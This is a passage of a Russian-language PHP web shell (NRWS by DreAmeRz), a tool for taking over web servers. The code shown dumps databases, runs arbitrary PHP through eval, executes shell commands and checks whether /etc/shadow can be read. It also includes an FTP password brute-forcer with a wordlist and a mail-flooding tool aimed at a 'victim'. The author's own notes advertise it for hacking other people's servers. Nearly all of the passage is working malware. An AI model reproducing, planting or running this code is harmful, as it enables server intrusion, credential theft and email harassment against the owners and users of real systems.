  443. if(@mysql_select_db($_POST['mysql_db'],$db))
  444. {
  445. // инфа о дампе
  446. $sql1 = "# MySQL dump created by NRWS\r\n";
  447. $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
  448. $sql1 .= "# ---------------------------------\r\n";
  449. $sql1 .= "# date : ".date ("j F Y g:i")."\r\n";
  450. $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
  451. $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
  452. $sql1 .= "# ---------------------------------\r\n\r\n";
  453. // получаем текст запроса создания структуры таблицы
  454. $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
  455. $row = @mysql_fetch_row($res);
  456. $sql1 .= $row[1]."\r\n\r\n";
  457. $sql1 .= "# ---------------------------------\r\n\r\n";
  458. $sql2 = '';
  459. // получаем данные таблицы
  460. $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
  461. if (@mysql_num_rows($res) > 0) {
  462. while ($row = @mysql_fetch_assoc($res)) {
  463. $keys = @implode("`, `", @array_keys($row));
  464. $values = @array_values($row);
  465. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  466. $values = @implode("', '", $values);
  467. $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
  468. }
  469. $sql2 .= "\r\n# ---------------------------------";
  470. }
  471. echo "<center><b>Готово! Дамп прошел удачно!</b></center>";
  472. // пишем в файл или выводим в браузер
  473. if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
  474. else { echo $sql1.$sql2; }
  475. } // end if(@mysql_select_db($_POST['mysql_db'],$db))
  476. else echo "Такой БД нет!";
  477. @mysql_close($db);
  478. } // end if($db)
  479. else echo "Нет коннекта c сервером!";
  480. } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
  481. else if(!empty($_POST['dif'])&&!$fp) { echo "ОШИБКА, нет прав записи в файл!"; }
  482. break;
  483. // SQL Attack
  484. case "sql":
  485. echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
  486. echo "&nbsp;База: &nbsp;<input type=text name=mysql_db size=15 value=";
  487. echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
  488. echo ">";
  489. echo "&nbsp;Таблица: &nbsp;<input type=text name=mysql_tbl size=15 value=";
  490. echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
  491. echo ">";
  492. echo "&nbsp;Логин: &nbsp;<input type=text name=mysql_l size=15 value=";
  493. echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
  494. echo ">";
  495. echo "&nbsp;Пароль: &nbsp;<input type=text name=mysql_p size=15 value=";
  496. echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
  497. echo ">";
  498. echo "<input type=hidden name=dir size=85 value=".$dir.">";
  499. echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
  500. echo "<br>&nbsp;Сохранить дамп в файле: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
  501. echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
  502. echo ">";
  503. echo "<input type=submit name=submit value=Сохранить>" ;
  504. echo "</font>";
  505. echo "</form>";
  506. print "<tr><td>";
  507. ###
  508. @$php_self=$_GET['PHP_SELF'];
  509. @$from=$_GET['from'];
  510. @$to=$_GET['to'];
  511. @$adress=$_POST['adress'];
  512. @$port=$_POST['port'];
  513. @$login=$_POST['login'];
  514. @$pass=$_POST['pass'];
  515. @$adress=$_GET['adress'];
  516. @$port=$_GET['port'];
  517. @$login=$_GET['login'];
  518. @$pass=$_GET['pass'];
  519. if(!isset($adress)){$adress="localhost";}
  520. if(!isset($login)){$login="root";}
  521. if(!isset($pass)){$pass="";}
  522. if(!isset($port)){$port="3306";}
  523. if(!isset($from)){$from=0;}
  524. if(!isset($to)){$to=50;}
  525. ?>
  526. <body vLink=white>
  527. <font color=black face=verdana size=1>
  528. <form> <? if(!@$conn){ ?>
  529. <table><tr><td valign=top>
  530. <input type=hidden name=ac value=sql>
  531. <tr><td valign=top>Хост: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
  532. <tr><td valign=top>Порт: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
  533. <tr><Td valign=top>Логин: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
  534. <tr><Td valign=top>Пароль: </td><td> <input name=pass value='<?=$pass?>' size=10>
  535. <input type=hidden name=p value=sql></td></tr>
  536. <tr><td></td><td><input type=submit name=conn value=Подключиться></form></td></tr><?}?>
  537. <tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
  538. </td></tr>
  539. </table>
  540. <table width=100%><tr><td>
  541. <?
  542. @$conn=$_GET['conn'];
  543. @$adress=$_GET['adress'];
  544. @$port=$_GET['port'];
  545. @$login=$_GET['login'];
  546. @$pass=$_GET['pass'];
  547. if($conn){
  548. $serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ОШИБКА: ".mysql_error());
  549. if($serv){$status="Подключен. :: <a href='$php_self?conn=0'>Выйти из базы</a>";}else{$status="Отключен.";}
  550. print "<b><font color=green>Статус: $status<br><br>";
  551. print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
  552. print "<font color=red>[Таблицы]</font><Br><font color=white>";
  553. $res = mysql_list_dbs($serv);
  554. while ($str=mysql_fetch_row($res)){
  555. print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
  556. @$tc++;
  557. }
  558. $pro="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  559. @$base=$_GET['base'];
  560. @$db=$_GET['db'];
  561. print "<font color=red>[Всего таблиц: $tc]</font><br>$pro";
  562. if($base){
  563. print "<div align=left><font color=green>Таблица: [$tbl]</div></font><br>";
  564. $result=mysql_list_tables($db);
  565. while($str=mysql_fetch_array($result)){
  566. $c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
  567. $records=mysql_fetch_array($c);
  568. print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
  569. mysql_free_result($c);
  570. }
  571. } #end base
  572. @$vn=$_GET['vn'];
  573. print "</td><td valign=top>";
  574. print "<font color=green>База данных: $db => $vn</font>";
  575. @$inside=$_GET['inside'];
  576. @$tbl=$_GET['tbl'];
  577. if($inside){
  578. print "<table cellpadding=0 cellspacing=1><tr>";
  579. mysql_select_db($db) or die(mysql_error());
  580. $c=mysql_query ("SELECT COUNT(*) FROM $tbl");
  581. $cfa=mysql_fetch_array($c);
  582. mysql_free_result($c);
  583. print "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>";
  584. print "
  585. Всего: $cfa[0]<form>
  586. <input type=hidden name=ac value=sql>
  587. От: <input name=from size=3 value=0>
  588. До: <input name=to size=3 value=$cfa[0]>
  589. <input type=submit name=show value=Показать>
  590. <input type=hidden name=inside value=1>
  591. <input type=hidden name=vn value=$vn>
  592. <input type=hidden name=db value=$db>
  593. <input type=hidden name=login value=$login>
  594. <input type=hidden name=pass value=$pass>
  595. <input type=hidden name=adress value=$adress>
  596. <input type=hidden name=conn value=1>
  597. <input type=hidden name=base value=1>
  598. <input type=hidden name=p value=sql>
  599. <input type=hidden name=tbl value=$tbl>
  600. [<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>Загрузить</a>]
  601. </form>";
  602. @$vn=$_GET['vn'];
  603. @$from=$_GET['from'];
  604. @$to=$_GET['to'];
  605. @$from=$_GET['from'];
  606. @$to=$_GET['to'];
  607. if(!isset($from)){$from=0;}
  608. if(!isset($to)){$to=50;}
  609. $query = "SELECT * FROM $vn LIMIT $from,$to";
  610. $result = mysql_query($query);
  611. for ($i=0;$i<mysql_num_fields($result);$i++){
  612. $name=mysql_field_name($result,$i);
  613. print "<td>&nbsp;</td><td bgcolor=#BCE0FF> $name </td> ";
  614. }
  615. print "</tr>";
  616. while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
  617. print "<tr>";
  618. foreach ($mn as $come=>$lee) {
  619. $nst_inside=htmlspecialchars($lee);
  620. print "<td>&nbsp;</td><td bgcolor=silver>$nst_inside</td>\r\n";
  621. } print "</tr>";
  622. }
  623. mysql_free_result($result);
  624. print "</table>";
  625. } #end inside
  626. print "</td></tr></table>";
  627. } # end $conn
  628. ### end of sql
  629. print "</tr></td></table> </td></tr></table>";
  630. print $copyr;
  631. die;
  632. break;
  633. //PHP Eval Code execution
  634. case "eval":
  635. echo <<<HTML
  636. <b>Исполнение php-кода (без "< ? ? >")</b>
  637. <table>
  638. <form method="POST" action="$self">
  639. <input type="hidden" name="ac" value="eval">
  640. <tr>
  641. <td><textarea name="ephp" rows="10" cols="60"></textarea></td>
  642. </tr>
  643. <tr>
  644. <td><input type="submit" value="Enter"></td>
  645. $tend
  646. HTML;
  647. if (isset($_POST['ephp'])){
  648. eval($_POST['ephp']);
  649. }
  650. break;
  651. // SEND MAIL
  652. case "sendmail":
  653. echo <<<HTML
  654. <table>
  655. <form method="POST" action="$self">
  656. <input type="hidden" name="ac" value="sendmail">
  657. <tr>От кого: <br>
  658. <input type="TEXT" name="frommail">
  659. <br>Кому:<br> <input type="TEXT" name="tomailz">
  660. <br>Тема: <br><input type="TEXT" name="mailtema">
  661. <br>Текст: <br>
  662. <td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
  663. </tr>
  664. <tr>
  665. <td><input type="submit" value="Отправить" name="submit"></td><form>
  666. $tend
  667. HTML;
  668. // никакая проверка не делается, а зачем ? =)
  669. if (isset($submit))
  670. {
  671. mail($tomailz,$mailtema,$mailtext,"From: $frommail");
  672. echo "<h2>Сообщение отправлено!</h2>";
  673. }
  674. break;
  675. // Информация о системе
  676. case "info":
  677. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  678. {
  679. $safemode = true;
  680. $hsafemode = "<font color=\"red\">Включено</font>";
  681. }
  682. else {$safemode = false; $hsafemode = "Отключено</font>";}
  683. /* display information */
  684. echo "<b>[ Информация о системе ]</b><br>";
  685. echo "<b>Хост:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
  686. echo "<b>IP сервера:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
  687. echo " <b>Сервер: </b>".$_SERVER['SERVER_SIGNATURE']." ";
  688. echo "<b>OC:</b> ".exec("uname -a")."(";
  689. print "".php_uname()." )<br>\n";
  690. echo "<b>Процессор:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
  691. echo "<b>Привилегии: </b>".exec("id")."<br>";
  692. echo "<b>Всего места: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>Свободно</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
  693. echo "<b>Текущий каталог:</b>".exec("pwd")."";
  694. echo " <br><b>Текуший web-путь: </b>".@$_SERVER['PHP_SELF']." ";
  695. echo "<br><b>Твой IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
  696. echo "<b>PHP version: </b>".phpversion()."<BR>";
  697. echo "<b> ID владельца процеса: </b>".get_current_user()."<BR>";
  698. echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
  699. if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
  700. print '<b>Есть доступ к /etc/passwd! </b><br>';
  701. }
  702. if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
  703. print '<b>Есть доступ к /etc/shadow!</b> <br>';
  704. }
  705. if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
  706. print '<b>Есть доступ к /etc/shadow-!</b> ';
  707. }
  708. if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
  709. print '<b>Есть доступ к /etc/master.passwd! </b><br>';
  710. }
  711. if(isset($_POST['th']) && $_POST['th']!=''){
  712. chdir($_POST['th']);
  713. };
  714. if(is_writable('/tmp/')){
  715. $fp=fopen('/tmp/qq8',"w+");
  716. fclose($fp);
  717. print "/tmp - открыта&nbsp;<br>\n";
  718. unlink('/tmp/qq8');
  719. }
  720. else{
  721. print "<font color=red>/tmp - не открыта</font><br>";
  722. }
  723. echo "<b>Безопасный режим: ".$hsafemode."</b><br>";
  724. if ($nixpasswd)
  725. {
  726. if ($nixpasswd == 1) {$nixpasswd = 0;}
  727. $num = $nixpasswd + $nixpwdperpage;
  728. echo "<b>*nix /etc/passwd:</b><br>";
  729. $i = $nixpasswd;
  730. while ($i < $num)
  731. {
  732. $uid = posix_getpwuid($i);
  733. if ($uid) {echo join(":",$uid)."<br>";}
  734. $i++;
  735. }
  736. }
  737. else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
  738. if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
  739. if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
  740. if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
  741. { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
  742. if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>Конфигурация Apache (httpd.conf)</b></u></a></b><br>";}
  743. if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log </b></u></a></b><br>";}
  744. break;
  745. // О скрипте
  746. case "about":
  747. echo "<center><b>Привет всем!</b><br><br>
  748. Наконец-то NWRS доступен в первой стабильной версии! Добавилось множество новых полезных возможностей. Все функции скрипта работают и работают корректно. Добавлены уникальные инструменты для взлома сервера. В то же время нет ничего лишнего. Все, что задумывалось - реализировано. Думаю, каждый найдет в скрипте что-то полезное для себя. Также заявляю о том, что я закрываю проект, ибо он достиг идеала :) Любой может его продолжить, php - открытый язык. На первых порах скрипт вообще был только у нескольких человек узкого круга друзей, писал его для себя, из-за своей природной лени.
  749. Ну, и спасибо этим людям: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (орфография и дизайн)... И многим другим... Их идеи очень помогли воплотить в жизнь столь универсальный инструмент. Огромное спасибо им!<br><br><b>Помните: используя этот скрипт на чужих серверах, вы нарушаете закон :) Так что осторожнее.</b></center>";
  750. echo "<center><br><br><em>Посетите эти сайты, и вы всегда будете в курсе событий:</em><br><br>
  751. <a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
  752. <a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
  753. <a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
  754. <a href='http://www.hackru.info'>www.hackru.info</a><br><br>
  755. <a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
  756. <a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
  757. Извиняюсь, если кого забыл.<br> <em>Автор не несет ответственности за материалы, размещенные на этих сайтах, оcобенно на последнем </em>:)
  758. <br><br><br><br><br><b>Скрипт распространяется по лицензии GNU GPL<br> 22 Июля 2005 г. &#169; DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
  759. break;
  760. // ФТП подбор паролей
  761. case "ftppass":
  762. $filename="/etc/passwd"; // passwd file
  763. $ftp_server="localhost"; // FTP-server
  764. echo "FTP-server: <b>$ftp_server</b> <br><br>";
  765. $fp = fopen ($filename, "r");
  766. if ($fp)
  767. {
  768. while (!feof ($fp)) {
  769. $buf = fgets($fp, 100);
  770. ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
  771. $ftp_user_name=$g[1];
  772. $ftp_user_pass=$g[1];
  773. $conn_id=ftp_connect($ftp_server);
  774. $login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  775. if (($conn_id) && ($login_result)) {
  776. echo "<b>Подключение login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
  777. ftp_close($conn_id);}
  778. else {
  779. echo $ftp_user_name." - error<br>";
  780. }
  781. }}
  782. break;
  783. case "ftp":
  784. echo "
  785. <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
  786. <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
  787. <b><a href=?ac=ftppass>Проверить на связку login\password</a></b>
  788. </td></tr>
  789. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTP Host:</td>
  790. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  791. <input class='inputbox' type='text' name='host' size=50></td></tr>
  792. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
  793. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  794. <input class='inputbox' type='text' name='login' size=50></td></tr>
  795. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Колличество паролей:</td>
  796. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  797. <input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
  798. <tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Пароль для проверки:</td>
  799. <td align=left width=350>&nbsp;&nbsp;&nbsp;
  800. <input class='inputbox' type='text' name='testing' size=50>
  801. <input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Лог сохраняется в pass.txt</b></td></tr>
  802. </form></table>";
  803. function s() {
  804. $word="qwrtypsdfghjklzxcvbnm";
  805. return $word[mt_rand(0,strlen($word)-1)];
  806. }
  807. function g() {
  808. $word="euioam";
  809. return $word[mt_rand(0,strlen($word)-2)];
  810. }
  811. function name0() { return s().g().s(); }
  812. function name1() { return s().g().s().g(); }
  813. function name2() { return s().g().g().s(); }
  814. function name3() { return s().s().g().s().g(); }
  815. function name4() { return g().s().g().s().g(); }
  816. function name5() { return g().g().s().g().s(); }
  817. function name6() { return g().s().s().g().s(); }
  818. function name7() { return s().g().g().s().g(); }
  819. function name8() { return s().g().s().g().g(); }
  820. function name9() { return s().g().s().g().s().g(); }
  821. function name10() { return s().g().s().s().g().s().s(); }
  822. function name11() { return s().g().s().s().g().s().s().g(); }
  823. $cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
  824. $cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
  825. function randword() {
  826. global $cool;
  827. $func="name".mt_rand(0,11);
  828. $func2="name".mt_rand(0,11);
  829. switch (mt_rand(0,11)) {
  830. case 0: return $func().mt_rand(5,99);
  831. case 1: return $func()."-".$func2();
  832. case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
  833. case 3: return $func()."!".$func();
  834. case 4: return randpass(mt_rand(5,12));
  835. default: return $func();
  836. }
  837. }
  838. function randpass($len) {
  839. $word="qwertyuiopasdfghjklzxcvbnm1234567890";
  840. $s="";
  841. for ($i=0; $i<$len; $i++) {
  842. $s.=$word[mt_rand(0,strlen($word)-1)];
  843. }
  844. return $s;
  845. }
  846. if (@unlink("pass.txt") < 0){
  847. echo "ничего нет";
  848. exit;
  849. }
  850. $file="pass.txt";
  851. if($file && $host && $login){
  852. $cn=mt_rand(30,30);
  853. for ($i=0; $i<$cn; $i++) {
  854. $s=$cool2[$i];
  855. $f=@fopen(pass.".txt","a+");
  856. fputs($f,"$s\n");
  857. }
  858. $cnt2=mt_rand(43,43);
  859. for ($i=0; $i<$cnt2; $i++) {
  860. $r=$cool[$i];
  861. $f=@fopen(pass.".txt","a+");
  862. fputs($f,"$login$r\n");
  863. }
  864. $p="$testing";
  865. $f=@fopen(pass.".txt","a+");
  866. fputs($f,"$p\n");
  867. $cnt3=mt_rand($number,$number);
  868. for ($i=0; $i<$cnt3; $i++) {
  869. $u=randword();
  870. $f=@fopen(pass.".txt","a+");
  871. fputs($f,"$u\n");
  872. }
  873. if(is_file($file)){
  874. $passwd=file($file,1000);
  875. for($i=0; $i<count($passwd); $i++){
  876. $stop=false;
  877. $password=trim($passwd[$i]);
  878. $open_ftp=@fsockopen($host,21);
  879. if($open_ftp!=false){
  880. fputs($open_ftp,"user $login\n");
  881. fputs($open_ftp,"pass $password\n");
  882. while(!feof($open_ftp) && $stop!=true){
  883. $text=fgets($open_ftp,4096);
  884. if(preg_match("/230/",$text)){
  885. $stop=true;
  886. $f=@fopen($host._ftp,"a+");
  887. fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
  888. echo "
  889. <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
  890. <tr><td align=center class=pagetitle><b><font color=\"blue\">Поздравляю!!! Пароль подобран.</font></b><br>
  891. &nbsp;&nbsp;Коннект: <b>$host</b><br>&nbsp;&nbsp;Логин: <b>$login</b><br>&nbsp;&nbsp;Пароль: <b>$password</b></td></tr></table>
  892. ";exit;
  893. }
  894. elseif(preg_match("/530/",$text)){
  895. $stop=true;
  896. }
  897. }
  898. fclose($open_ftp);
  899. }else{
  900. echo "
  901. <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
  902. <tr><td align=center class=pagetitle bgcolor=#FF0000><b>Неверно указан ftp хостинга!!! На <b><u>$host</u></b> закрыт 21 порт!</b></b></td></tr>
  903. </table>
  904. ";exit;
  905. }
  906. }
  907. }
  908. }
  909. break;
  910. // SQL Attack
  911. case "sql":
  912. break;
  913. // MailFlud
  914. case "mailfluder":
  915. $email=$_POST['email']; // Мыло жертвы
  916. $from=$_POST['from']; // Мыло жертвы
  917. $num=$_POST['num']; // Число писем
  918. $text=$_POST['text']; // Текст флуда
  919. $kb=$_POST['kb']; // Вес письма (kb)
  920. ?>
  921. <script language="JavaScript"><!--
  922. function reset_form() {
  923. document.forms[0].elements[0].value="";
  924. document.forms[0].elements[1].value="";
  925. document.forms[0].elements[2].value="";
  926. document.forms[0].elements[3].value="";
  927. document.forms[0].elements[4].value="";
  928. }
  929. //--></script>
  930. <?php
  931. if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
  932. $num_text=strlen($text)+1; // Определяет длину текста + 1 (пробел в конце)
  933. $num_kb=(1024/$num_text)*$kb;
  934. $num_kb=ceil($num_kb);
  935. for ($i=1; $i<=$num_kb; $i++) {
  936. $msg=$msg.$text." ";
  937. }
  938. for ($i=1; $i<=$num; $i++) {
  939. mail($email, $text, $msg, "From: $from");
  940. }
  941. $all_kb=$num*$kb;
  942. echo <<<EOF
  943. <p align="center">Жертва: <b>$email</b><br>
  944. Кол-во писем: <b>$num</b><br>
  945. Общий посланный объем: <b>$all_kb kb</b><br></p>
  946. EOF;
  947. }
  948. else {
  949. echo <<<EOF
  950. <form action="?ac=mailfluder" method="post">
  951. <table align="center" border="0" bordercolor="#000000">
  952. <tr><td>Мыло жертвы</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
  953. <tr><td>От липового мыла</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
  954. <tr><td>Число писем</td><td><input type="text" name="num" value="5" size="25"></td></tr>
  955. <tr><td>Текст флуда</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
  956. <tr><td>Вес письма (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
  957. <tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
  958. </table>
  959. </form>
  960. EOF;
  961. }
  962. break;
  963. case "tar":
  964. # архивация директории
  965. $fullpath = $d."/".$tar;
  966. /* задаем случайные имена файлов архивации*/
  967. $CHARS = "abcdefghijklmnopqrstuvwxyz";
  968. for ($i=0; $i<6; $i++) $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
  969. echo "<br>
  970. Каталог <u><b>$fullpath</b></u> ".exec("tar -zc $fullpath -f $charsname.tar.gz")."упакован в файл <u>$charsname.tar.gz</u>";
  971. echo "
  972. <form action='?ac=tar' method='post'>
  973. <tr><td align=center colspan=2 class=pagetitle><b>Архивация <u>$name.tar.gz</u>:</b></td></tr>
  974. <tr>
  975. <td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
  976. <td valign=top><input type=submit value='Начать'></td>
  977. </tr></form>";
  978. exec($archive);
  979. break;
  980. // Навигация
  981. case "navigation":
  982. // Пошла навигация
  983. $mymenu = " [<a href='$php_self?ac=navigation&d=$d&e=$e'>Просмотр </a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Удалить</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Редактировать</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Очистить</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Заменить текст</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Загрузить</a>]<br>";
  984. if(@$_GET['download']){
  985. @$download=$_GET['download'];
  986. @$d=$_GET['d'];
  987. header("Content-disposition: attachment; filename=\"$download\";");
  988. readfile("$d/$download");
  989. exit;}
  990. $images=array(".gif",".jpg",".png",".bmp",".jpeg");
  991. $whereme=getcwd();
  992. @$d=@$_GET['d'];
  993. $copyr = "<center>";
  994. $php_self=@$_SERVER['PHP_SELF'];
  995. if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
  996. if(!isset($d)){$d=$whereme;}
  997. $d=str_replace("\\","/",$d);
  998. $expl=explode("/",$d);
  999. $coun=count($expl);
  1000. if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
  1001. else{
  1002. echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
  1003. for($i=1; $i<$coun; $i++){
  1004. @$xx.=$expl[$i]."/";
  1005. $sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
  1006. $sls=str_replace("//","/",$sls);
  1007. $sls=str_replace("/'></a>/","/'></a>",$sls);
  1008. print $sls;
  1009. }
  1010. echo "</td></tr>";
  1011. //if($os=="unix"){ echo "
  1012. //<tr><td><b>id:</b> ".@exec('id')."</td></tr>
  1013. //<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";}
  1014. if(@$_GET['delfl']){
  1015. @$delfolder=$_GET['delfolder'];
  1016. echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
  1017. (All files must be writable)<br>
  1018. <a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?ac=navigation&d=$d'>No</a><br><br>
  1019. ";
  1020. exit;
  1021. }
  1022. if(@$_GET['deldir']){
  1023. @$dir=$_GET['dir'];
  1024. function deldir($dir)
  1025. {
  1026. $handle = @opendir($dir);
  1027. while (false!==($ff = @readdir($handle))){
  1028. if($ff != "." && $ff != ".."){
  1029. if(@is_dir("$dir/$ff")){
  1030. deldir("$dir/$ff");
  1031. }else{
  1032. @unlink("$dir/$ff");
  1033. }}}
  1034. @closedir($handle);
  1035. if(@rmdir($dir)){
  1036. @$success = true;}
  1037. return @$success;
  1038. }
  1039. $dir=@$dir;
